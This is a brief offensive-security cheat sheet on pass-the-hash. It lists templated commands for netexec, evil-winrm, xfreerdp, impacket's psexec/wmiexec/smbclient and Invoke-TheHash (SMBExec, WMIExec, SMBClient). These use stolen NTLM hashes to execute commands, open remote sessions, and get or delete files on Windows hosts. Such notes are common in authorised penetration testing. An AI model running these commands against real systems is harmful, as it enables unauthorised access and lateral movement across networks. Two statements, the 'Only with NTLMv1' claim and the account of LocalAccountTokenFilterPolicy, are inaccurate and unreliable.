Pass The Hash

Only with NTLMv1.

It consists of passing hashes as passwords to log in, which is useful when password cracking has failed. It can be done on an Active Directory domain or on local accounts without passing the domain.

Linux

Tools	Details
netexec	nxc smb <IP> -d . -u <USER> -H <HASH> -x <COMMAND> nxc smb <IP> --local-auth -u <USER> -H <HASH> -x <COMMAND>
evil-winrm	evil-winrm -i <IP> -u <USER>[@<DOMAIN>] -H <HASH>
xfreerdp	xfreerdp /v:<IP> /u:<USER> /pth:<HASH> /dynamic-resolution
impacket-smbclient	smbclient //<IP>//<SHARE> -U <USER> --pw-nt-hash <HASH>
impacket-psexec	psexec -hashes <[LMHash]:NTHash> <USER>@<IP>
impacket-wmiexec	wmiexec -hashes <[LMHash]:NTHash> <USER>@<IP>

Others impacket-scripts such as atexec, smbexec.

Windows

Invoke-TheHash

Invoke-SMBExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"

Invoke-WMIExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"

Invoke-SMBClient -Username <USER> -Hash <HASH> -Source \\server\share [-Action Get|Delete]

The user and hash we use for authentication must have administrative rights on the target computer, but if LocalAccountTokenFilterPolicy is set then only RID-500, “Administrator,” can perform remote administration tasks, if FilterAdministratorToken is also set neither can he. These settings are only for local administrative accounts.